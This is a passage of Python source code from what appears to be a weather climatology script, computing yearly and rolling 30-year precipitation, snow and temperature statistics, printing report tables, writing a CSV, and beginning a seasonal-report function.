+= clmt[y]["recordqty"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) elif clmt[y]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["year_max_days"][0]: climo30yrs[c]["prcpPROP"]["year_max_days"][0] = clmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_max_days"][1].append(y) if clmt[y]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) elif clmt[y]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["year_min_days"][0]: climo30yrs[c]["prcpPROP"]["year_min_days"][0] = clmt[y]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["year_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["year_min_days"][1].append(y) if sum(clmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) elif sum(clmt[y]["prcp"]) > climo30yrs[c]["prcpPROP"]["year_max"][0]: climo30yrs[c]["prcpPROP"]["year_max"][0] = sum(clmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_max"][1] = [] climo30yrs[c]["prcpPROP"]["year_max"][1].append(y) if sum(clmt[y]["prcp"]) == climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) elif sum(clmt[y]["prcp"]) < climo30yrs[c]["prcpPROP"]["year_min"][0]: climo30yrs[c]["prcpPROP"]["year_min"][0] = sum(clmt[y]["prcp"]) climo30yrs[c]["prcpPROP"]["year_min"][1] = [] climo30yrs[c]["prcpPROP"]["year_min"][1].append(y) # SNOW alltime["snow"].append(sum(clmt[y]["snow"])) alltime["snowPROP"]["days"] += clmt[y]["snowDAYS"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["snowDAYS"] == alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][1].append(y) elif clmt[y]["snowDAYS"] > alltime["snowPROP"]["year_max_days"][0]: alltime["snowPROP"]["year_max_days"][0] = clmt[y]["snowDAYS"] alltime["snowPROP"]["year_max_days"][1] = [] 
alltime["snowPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["snow"]) == alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][1].append(y) elif sum(clmt[y]["snow"]) > alltime["snowPROP"]["year_max"][0]: alltime["snowPROP"]["year_max"][0] = sum(clmt[y]["snow"]) alltime["snowPROP"]["year_max"][1] = [] alltime["snowPROP"]["year_max"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(clmt[y]["snow"])) climo30yrs[c]["snowPROP"]["days"] += clmt[y]["snowDAYS"] if clmt[y]["recordqty"] > excludeyear: if clmt[y]["snowDAYS"] == climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) elif clmt[y]["snowDAYS"] > climo30yrs[c]["snowPROP"]["year_max_days"][0]: climo30yrs[c]["snowPROP"]["year_max_days"][0] = clmt[y]["snowDAYS"] climo30yrs[c]["snowPROP"]["year_max_days"][1] = [] climo30yrs[c]["snowPROP"]["year_max_days"][1].append(y) if sum(clmt[y]["snow"]) == climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][1].append(y) elif sum(clmt[y]["snow"]) > climo30yrs[c]["snowPROP"]["year_max"][0]: climo30yrs[c]["snowPROP"]["year_max"][0] = sum(clmt[y]["snow"]) climo30yrs[c]["snowPROP"]["year_max"][1] = [] climo30yrs[c]["snowPROP"]["year_max"][1].append(y) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in clmt[y]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg: alltime["tempAVGlist"].append(mean(clmt[y]["tempAVGlist"])) if mean(clmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) > alltime["tavgPROP"]["year_max"][0]: alltime["tavgPROP"]["year_max"][0] = mean(clmt[y]["tempAVGlist"]) 
alltime["tavgPROP"]["year_max"][1] = [] alltime["tavgPROP"]["year_max"][1].append(y) if mean(clmt[y]["tempAVGlist"]) == alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) < alltime["tavgPROP"]["year_min"][0]: alltime["tavgPROP"]["year_min"][0] = mean(clmt[y]["tempAVGlist"]) alltime["tavgPROP"]["year_min"][1] = [] alltime["tavgPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(clmt[y]["tempAVGlist"]) > excludeyear_tavg: climo30yrs[c]["tempAVGlist"].append(mean(clmt[y]["tempAVGlist"])) if mean(clmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["year_max"][0]: climo30yrs[c]["tavgPROP"]["year_max"][0] = mean(clmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_max"][1] = [] climo30yrs[c]["tavgPROP"]["year_max"][1].append(y) if mean(clmt[y]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["year_min"][0]: climo30yrs[c]["tavgPROP"]["year_min"][0] = mean(clmt[y]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["year_min"][1] = [] climo30yrs[c]["tavgPROP"]["year_min"][1].append(y) # TMAX for x in clmt[y]["tmax"]: alltime["tmax"].append(x) if len(clmt[y]["tmax"]) > excludeyear: if mean(clmt[y]["tmax"]) == alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmax"]) > alltime["tmaxPROP"]["year_max"][0]: alltime["tmaxPROP"]["year_max"][0] = mean(clmt[y]["tmax"]) alltime["tmaxPROP"]["year_max"][1] = [] alltime["tmaxPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmax"]) == 
alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmax"]) < alltime["tmaxPROP"]["year_min"][0]: alltime["tmaxPROP"]["year_min"][0] = mean(clmt[y]["tmax"]) alltime["tmaxPROP"]["year_min"][1] = [] alltime["tmaxPROP"]["year_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(clmt[y]["tmax"]) > excludeyear: if mean(clmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmax"]) > climo30yrs[c]["tmaxPROP"]["year_max"][0]: climo30yrs[c]["tmaxPROP"]["year_max"][0] = mean(clmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_max"][1] = [] climo30yrs[c]["tmaxPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmax"]) == climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmax"]) < climo30yrs[c]["tmaxPROP"]["year_min"][0]: climo30yrs[c]["tmaxPROP"]["year_min"][0] = mean(clmt[y]["tmax"]) climo30yrs[c]["tmaxPROP"]["year_min"][1] = [] climo30yrs[c]["tmaxPROP"]["year_min"][1].append(y) # TMIN for x in clmt[y]["tmin"]: alltime["tmin"].append(x) if len(clmt[y]["tmin"]) > excludeyear: if mean(clmt[y]["tmin"]) == alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmin"]) > alltime["tminPROP"]["year_max"][0]: alltime["tminPROP"]["year_max"][0] = mean(clmt[y]["tmin"]) alltime["tminPROP"]["year_max"][1] = [] alltime["tminPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmin"]) == alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmin"]) < alltime["tminPROP"]["year_min"][0]: alltime["tminPROP"]["year_min"][0] = mean(clmt[y]["tmin"]) alltime["tminPROP"]["year_min"][1] = [] alltime["tminPROP"]["year_min"][1].append(y) for c in 
climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in clmt[y]["tmin"]: climo30yrs[c]["tmin"].append(x) if len(clmt[y]["tmin"]) > excludeyear: if mean(clmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][1].append(y) elif mean(clmt[y]["tmin"]) > climo30yrs[c]["tminPROP"]["year_max"][0]: climo30yrs[c]["tminPROP"]["year_max"][0] = mean(clmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_max"][1] = [] climo30yrs[c]["tminPROP"]["year_max"][1].append(y) if mean(clmt[y]["tmin"]) == climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][1].append(y) elif mean(clmt[y]["tmin"]) < climo30yrs[c]["tminPROP"]["year_min"][0]: climo30yrs[c]["tminPROP"]["year_min"][0] = mean(clmt[y]["tmin"]) climo30yrs[c]["tminPROP"]["year_min"][1] = [] climo30yrs[c]["tminPROP"]["year_min"][1].append(y) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for All Years on Record") print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("Part 1: Precipitation Stats") print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("Years","PRCP","PRCP","PRCP","PRCP","PRCP","PRCP","SNOW","SNOW","SNOW","SNOW")) print("{:▒^9} {:▒^12} {:▒^9} {:▒^9} {:▒^6} {:▒^12} {:▒^12} | {:▒^11} {:▒^9} {:▒^6} {:▒^11} |".format("","DAYS","DAYS MAX","DAYS MIN","AVG", "MAX","MIN","DAYS","DAYS MAX","AVG", "MAX")) # Y PD PDx PDn PA PM Pmin SD SDx SA SM print("{:-^9} {:-^12} {:-^9} {:-^9} {:-^6} {:-^12} {:-^12} | {:-^11} {:-^9} {:-^6} {:-^11} |".format("","","","","","","","","","","")) print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | 
{:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format("All Time", alltime["prcpPROP"]["days"], round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1), alltime["prcpPROP"]["year_max_days"][0], alltime["prcpPROP"]["year_max_days"][1][0] if len(alltime["prcpPROP"]["year_max_days"][1]) == 1 else len(alltime["prcpPROP"]["year_max_days"][1]), alltime["prcpPROP"]["year_min_days"][0], alltime["prcpPROP"]["year_min_days"][1][0] if len(alltime["prcpPROP"]["year_min_days"][1]) == 1 else len(alltime["prcpPROP"]["year_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["year_max"][0],2), alltime["prcpPROP"]["year_max"][1][0] if len(alltime["prcpPROP"]["year_max"][1]) == 1 else len(alltime["prcpPROP"]["year_max"][1]), round(alltime["prcpPROP"]["year_min"][0],2), alltime["prcpPROP"]["year_min"][1][0] if len(alltime["prcpPROP"]["year_min"][1]) == 1 else len(alltime["prcpPROP"]["year_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["year_max_days"][0], alltime["snowPROP"]["year_max_days"][1][0] if len(alltime["snowPROP"]["year_max_days"][1]) == 1 else len(alltime["snowPROP"]["year_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["year_max"][0],2), alltime["snowPROP"]["year_max"][1][0] if len(alltime["snowPROP"]["year_max"][1]) == 1 else len(alltime["snowPROP"]["year_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), 
climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["year_max_days"][0], climo30yrs[c]["prcpPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]), climo30yrs[c]["prcpPROP"]["year_min_days"][0], climo30yrs[c]["prcpPROP"]["year_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["year_max"][0],2), climo30yrs[c]["prcpPROP"]["year_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max"][1]), round(climo30yrs[c]["prcpPROP"]["year_min"][0],2), climo30yrs[c]["prcpPROP"]["year_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["year_max_days"][0], climo30yrs[c]["snowPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["year_max"][0],2), climo30yrs[c]["snowPROP"]["year_max"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} 
{:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["year_max"][0],1), alltime["tavgPROP"]["year_max"][1][0] if len(alltime["tavgPROP"]["year_max"][1]) == 1 else len(alltime["tavgPROP"]["year_max"][1]), round(alltime["tavgPROP"]["year_min"][0],1), alltime["tavgPROP"]["year_min"][1][0] if len(alltime["tavgPROP"]["year_min"][1]) == 1 else len(alltime["tavgPROP"]["year_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["year_max"][0],1), alltime["tmaxPROP"]["year_max"][1][0] if len(alltime["tmaxPROP"]["year_max"][1]) == 1 else len(alltime["tmaxPROP"]["year_max"][1]), round(alltime["tmaxPROP"]["year_min"][0],1), alltime["tmaxPROP"]["year_min"][1][0] if len(alltime["tmaxPROP"]["year_min"][1]) == 1 else len(alltime["tmaxPROP"]["year_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["year_max"][0],1), alltime["tminPROP"]["year_max"][1][0] if len(alltime["tminPROP"]["year_max"][1]) == 1 else len(alltime["tminPROP"]["year_max"][1]), round(alltime["tminPROP"]["year_min"][0],1), alltime["tminPROP"]["year_min"][1][0] if len(alltime["tminPROP"]["year_min"][1]) == 1 else len(alltime["tminPROP"]["year_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | 
{:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["year_max"][0],1), climo30yrs[c]["tavgPROP"]["year_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_max"][1]), round(climo30yrs[c]["tavgPROP"]["year_min"][0],1), climo30yrs[c]["tavgPROP"]["year_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["year_max"][0],1), climo30yrs[c]["tmaxPROP"]["year_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_max"][1]), round(climo30yrs[c]["tmaxPROP"]["year_min"][0],1), climo30yrs[c]["tmaxPROP"]["year_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["year_max"][0],1), climo30yrs[c]["tminPROP"]["year_max"][1][0] if len(climo30yrs[c]["tminPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_max"][1]), round(climo30yrs[c]["tminPROP"]["year_min"][0],1), climo30yrs[c]["tminPROP"]["year_min"][1][0] if len(climo30yrs[c]["tminPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "yearReport_Jan-Dec_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (Jan 1-Dec 31)","PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG 
stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") 
w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def seasonReport(season,climatology=30,increment=5,output=False): """Detailed Climatology Report for a Meteorological Season of interest. Months included in Meteorological seasons are as follows: Spring: 3,4,5 Summer: 6,7,8 Fall: 9,10,11 Winter: 12,1,2 Args: season: Season being inquired about. Accepted entries are: <"spring", "summer","fall"|"autumn","winter"> Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: seasonReport("spring") -> Returns a 30-yr, 5-yr incremented climatological report for all Met. Spring's on record seasonReport("winter",climatology=15) -> Returns a 15-yr, 5-yr incremented climatological report for all Met. winters on record. 
seasonReport("summer",climatology=10,increment=1,output=True) -> Returns a 1-yr incremented, 10yr climatology report for all Met. Summers on record and outputs a CSV report. """ if season.lower() not in ["spring","summer","fall","autumn","winter"]: return print("* OOPS! {} is not a valid season. Try again!".format(season.capitalize())) if season.lower() == "autumn": season = "fall" season = season.lower() valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"season_max_days":[-1,[]],"season_min_days":[999,[]],"season_max":[-1,[]],"season_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"season_max_days":[-1,[]],"season_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmax": [],"tmaxPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmin": [],"tminPROP":{"season_max":[-999,[]],"season_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"season_max_days":[-1,[]],"season_min_days":[999,[]],"season_max":[-1,[]],"season_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"season_max_days":[-1,[]],"season_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmax": [],"tmaxPROP":{"season_max":[-999,[]],"season_min":[999,[]]}, "tmin": [],"tminPROP":{"season_max":[-999,[]],"season_min":[999,[]]}} print("*** PLEASE WAIT. 
This will take a few moments ***") for y in valid_yrs: # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' alltime["total_days"] += metclmt[y][season]["recordqty"] # PRCP alltime["prcp"].append(sum(metclmt[y][season]["prcp"])) alltime["prcpPROP"]["days"] += metclmt[y][season]["prcpDAYS"] if metclmt[y][season]["prcpDAYS"] == alltime["prcpPROP"]["season_max_days"][0]: alltime["prcpPROP"]["season_max_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] > alltime["prcpPROP"]["season_max_days"][0]: alltime["prcpPROP"]["season_max_days"][0] = metclmt[y][season]["prcpDAYS"] alltime["prcpPROP"]["season_max_days"][1] = [] alltime["prcpPROP"]["season_max_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == alltime["prcpPROP"]["season_max"][0]: alltime["prcpPROP"]["season_max"][1].append(y) elif sum(metclmt[y][season]["prcp"]) > alltime["prcpPROP"]["season_max"][0]: alltime["prcpPROP"]["season_max"][0] = sum(metclmt[y][season]["prcp"]) alltime["prcpPROP"]["season_max"][1] = [] alltime["prcpPROP"]["season_max"][1].append(y) if metclmt[y][season]["recordqty"] > excludeseason: if metclmt[y][season]["prcpDAYS"] == alltime["prcpPROP"]["season_min_days"][0]: alltime["prcpPROP"]["season_min_days"][1].append(y) elif metclmt[y][season]["prcpDAYS"] < alltime["prcpPROP"]["season_min_days"][0]: alltime["prcpPROP"]["season_min_days"][0] = metclmt[y][season]["prcpDAYS"] alltime["prcpPROP"]["season_min_days"][1] = [] alltime["prcpPROP"]["season_min_days"][1].append(y) if sum(metclmt[y][season]["prcp"]) == alltime["prcpPROP"]["season_min"][0]: alltime["prcpPROP"]["season_min"][1].append(y) elif sum(metclmt[y][season]["prcp"]) < alltime["prcpPROP"]["season_min"][0]: alltime["prcpPROP"]["season_min"][0] = sum(metclmt[y][season]["prcp"]) alltime["prcpPROP"]["season_min"][1] = [] alltime["prcpPROP"]["season_min"][1].append(y) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in 
